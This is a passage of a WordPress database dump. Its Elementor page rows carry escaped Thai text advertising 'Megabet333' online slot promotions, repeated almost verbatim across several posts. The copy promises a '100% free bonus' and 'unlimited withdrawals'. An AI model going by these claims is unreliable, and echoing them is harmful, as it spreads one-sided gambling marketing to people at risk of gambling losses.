\\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(391,72,'_elementor_edit_mode','builder'),(392,72,'_elementor_template_type','wp-page'),(393,72,'_elementor_version','3.32.5'),(394,72,'_elementor_pro_version','3.32.3'),(395,72,'_wp_page_template','default'),(396,72,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(397,72,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(402,73,'_elementor_edit_mode','builder'),(403,73,'_elementor_template_type','wp-page'),(404,73,'_elementor_version','3.32.5'),(405,73,'_elementor_pro_version','3.32.3'),(406,73,'_wp_page_template','default'),(407,73,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(408,73,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e2d\\u0e07\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(411,74,'_elementor_edit_mode','builder'),(412,74,'_elementor_template_type','wp-page'),(413,74,'_elementor_version','3.32.5'),(414,74,'_elementor_pro_version','3.32.3'),(415,74,'_wp_page_template','default'),(416,74,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(417,74,'_elementor_data','[{\"id\":\"d070aea\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4d6b9b4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db612d4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 Megabet333 \\u0e23\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1f\\u0e23\\u0e35 100% \\u0e16\\u0e2d\\u0e19\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aff2186\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"346\\\" data-end=\\\"760\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e14\\u0e36\\u0e07\\u0e14\\u0e39\\u0e14\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c megabet \\u0e21\\u0e32\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e01\\u0e47\\u0e04\\u0e07\\u0e2b\\u0e19\\u0e35\\u0e44\\u0e21\\u0e48\\u0e1e\\u0e49\\u0e19 \\u201c<strong>\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15<\\/strong>\\u201d \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e1b\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e01\\u0e31\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e36\\u0e07\\u0e41\\u0e02\\u0e48\\u0e07\\u0e02\\u0e31\\u0e19\\u0e01\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e40\\u0e14\\u0e47\\u0e14 \\u0e46 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e2d\\u0e32\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33 \\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e16\\u0e49\\u0e32\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e41\\u0e08\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e40\\u0e04\\u0e22 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c\\u0e43\\u0e19\\u0e1b\\u0e31\\u0e08\\u0e08\\u0e38\\u0e1a\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e21\\u0e32\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e1a\\u0e04\\u0e25\\u0e38\\u0e21\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 \\u0e1d\\u0e32\\u0e01\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e16\\u0e2d\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e42\\u0e1b\\u0e23\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 